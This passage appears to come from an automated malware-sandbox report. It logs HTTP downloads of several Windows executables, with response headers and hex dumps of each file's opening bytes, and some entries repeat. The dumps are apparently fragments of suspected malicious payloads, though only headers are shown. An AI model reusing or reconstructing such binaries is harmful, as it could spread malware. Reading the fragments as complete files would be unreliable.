40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 8a 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 28 84 00 00 d0 4a 00 00 03 00 00 00 3e 00 00 06 f8 ce 00 00 c0 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 6f 00 00 00 00 00 00 00 02 73 14 00 00 0a 7d 01 00 00 04 02 72 01 00 00 70 7d 08 00 00 04 02 73 24 00 00 06 7d 09 00 00 04 02 73 2a 00 00 06 7d 0a 00 00 04 02 73 28 00 00 06 7d 0b 00 00 04 02 73 2f 00 00 06 7d 0c 00 00 04 02 73 35 00 00 06 7d 0d 00 00 04 02 73 33 00 00 06 7d 0e 00 00 04 02 14 7d 0f 00 00 04 02 28 15 00 00 0a 00 00 02 28 1f 00 00 06 00 2a 00 13 30 05 00 a3 00 00 00 01 00 00 11 00 02 02 7b 18 00 00 04 6f 16 00 00 0a 7d 04 00 00 04 02 7b 04 00 00 04 72 03 00 00 70 7e 17 00 00 0a 6f 18 00 00 0a 72 07 00 00 70 7e 17 00 00 0a 6f 18 00 00 0a 72 0b 00 00 70 7e 17 00 00 0a 6f 18 00 00 0a 72 0f 00 00 70 7e 17 00 00 0a 6f 18 00 00 0a 0d 09 72 13 00 00 70 6f 19 00 00 0a 0b 09 72 1b 00 00 70 6f 19 00 00 0a 0a 09 6f 1a 00 00 0a 0c 02 09 16 07 6f 1b 00 00 0a 7d 05 00 00 04 02 09 07 06 07 59 6f 1b 00 00 0a 7d 06 00 00 04 02 09 06 08 06 59 6f 1b 00 00 0a 7d 07 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:45:54 GMTContent-Type: application/octet-streamContent-Length: 582656Connection: keep-aliveLast-Modified: Thu, 26 Oct 2023 01:29:41 GMTETag: "8e400-608948181064e"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pceHxD1oNPSuio70zIPkzbsiCWO61KHVb2QtfHGqEyyMTYNRfu%2BOnay3Giurc79AaVtTcVU36TPm6oSXKovJ573cGYvgPYCSdsc4xGU6GGEHYWrxR7MdPcMu%2FgxtEJNxxWHO%2BxQbHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81c1151a2e9d58b4-IADalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3c fd 54 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 08 00 00 08 00 00 00 00 00 00 22 f8 08 00 00 20 00 00 00 00 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cf f7 08 00 4f 00 00 00 00 00 09 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 09 00 0c 00 00 00 18 ce 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 d8 08 00 00 20 00 00 00 da 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 00 09 00 00 06 00 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 09 00 00 02 00 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 f8 08 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 86 00 00 d0 6f 00 00 03 00 00 00 7d 00 00 06 98 f6 00 00 80 d7 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<T0" @ @@O p H.text( `.rsrc@@.reloc @BHo
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:45:56 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4Last-Modified: Wed, 25 Oct 2023 08:05:04 GMTETag: "5a3b9-60885e9b0edf2"Accept-Ranges: bytesContent-Length: 369593Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6d 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 84 02 00 00 04 00 00 2a 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 75 00 00 a0 00 00 00 00 70 03 00 20 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a2 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5d 02 00 00 90 00 00 00 06 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 20 47 00 00 00 70 03 00 00 48 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:47:42 GMTContent-Type: application/octet-streamContent-Length: 487424Connection: keep-aliveLast-Modified: Thu, 26 Oct 2023 01:49:00 GMTETag: "77000-60894c69c80ec"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2Fm10HX%2B4OohrxTkIRnJRx93o%2BMzPvAxeYf47lIFRjDVD4exv%2FSRLKtctWTF%2B11W0ZzVJPg%2FF4MfHk%2Flrj1%2FelrKK7M1KTb%2BFlmcyjEdv%2BIkMSSkxC%2FSdv2%2FPhUqwOr%2FYP%2BD48xTVhh%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81c117ba4d5359da-IADalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1a c4 b6 a7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 66 07 00 00 08 00 00 00 00 00 00 82 85 07 00 00 20 00 00 00 a0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 85 07 00 4f 00 00 00 00 a0 07 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 07 00 0c 00 00 00 78 5b 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 65 07 00 00 20 00 00 00 66 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 07 00 00 06 00 00 00 68 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 07 00 00 02 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 85 07 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 86 00 00 d0 6f 00 00 03 00 00 00 7d 00 00 06 98 f6 00 00 e0 64 06 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0f @ @0Ox[p H.texte f `.rsrch@@.relocn@BdHo}d
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:47:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 26 Oct 2023 07:47:13 GMTETag: "177c00-60899c7ae4d10"Accept-Ranges: bytesContent-Length: 1539072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 14 17 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 17 00 00 04 00 00 6f 1e 18 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 40 f5 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 17 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 00 17 00 00 c0 00 00 00 f6 16 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 c0 17 00 00 0a 00 00 00 72 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:47:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 26 Oct 2023 07:47:13 GMTETag: "177c00-60899c7ae4d10"Accept-Ranges: bytesContent-Length: 1539072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 14 17 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 17 00 00 04 00 00 6f 1e 18 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 40 f5 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 17 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 00 17 00 00 c0 00 00 00 f6 16 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 c0 17 00 00 0a 00 00 00 72 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:47:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 26 Oct 2023 07:45:26 GMTETag: "e4800-60899c155d3c3"Accept-Ranges: bytesContent-Length: 935936Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b 03 ce b3 5f 62 a0 e0 5f 62 a0 e0 5f 62 a0 e0 8c 10 a3 e1 51 62 a0 e0 8c 10 a5 e1 f2 62 a0 e0 8c 10 a4 e1 49 62 a0 e0 8c 10 a1 e1 5c 62 a0 e0 5f 62 a1 e0 dc 62 a0 e0 10 1e a4 e1 4e 62 a0 e0 10 1e a3 e1 4a 62 a0 e0 10 1e a5 e1 0a 62 a0 e0 9e 1e a5 e1 5e 62 a0 e0 9e 1e a2 e1 5e 62 a0 e0 52 69 63 68 5f 62 a0 e0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 14 19 3a 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 84 0b 00 00 de 02 00 00 00 00 00 db 11 00 00 00 10 00 00 00 a0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 22 0e 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 00 d8 4b 00 00 90 b7 0c 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 b6 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 83 0b 00 00 10 00 00 00 84 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 01 9d 01 00 00 a0 0b 00 00 9e 01 00 00 88 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 d3 00 00 00 40 0d 00 00 b6 00 00 00 26 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 c8 11 00 00 00 20 0e 00 00 12 00 00 00 dc 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 57 00 00 00 50 0e 00 00 58 00 00 00 f0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:47:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 26 Oct 2023 07:45:26 GMTETag: "e4800-60899c155d3c3"Accept-Ranges: bytesContent-Length: 935936Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b 03 ce b3 5f 62 a0 e0 5f 62 a0 e0 5f 62 a0 e0 8c 10 a3 e1 51 62 a0 e0 8c 10 a5 e1 f2 62 a0 e0 8c 10 a4 e1 49 62 a0 e0 8c 10 a1 e1 5c 62 a0 e0 5f 62 a1 e0 dc 62 a0 e0 10 1e a4 e1 4e 62 a0 e0 10 1e a3 e1 4a 62 a0 e0 10 1e a5 e1 0a 62 a0 e0 9e 1e a5 e1 5e 62 a0 e0 9e 1e a2 e1 5e 62 a0 e0 52 69 63 68 5f 62 a0 e0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 14 19 3a 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 84 0b 00 00 de 02 00 00 00 00 00 db 11 00 00 00 10 00 00 00 a0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 22 0e 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 00 d8 4b 00 00 90 b7 0c 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 b6 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 83 0b 00 00 10 00 00 00 84 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 01 9d 01 00 00 a0 0b 00 00 9e 01 00 00 88 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 d3 00 00 00 40 0d 00 00 b6 00 00 00 26 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 c8 11 00 00 00 20 0e 00 00 12 00 00 00 dc 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 57 00 00 00 50 0e 00 00 58 00 00 00 f0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
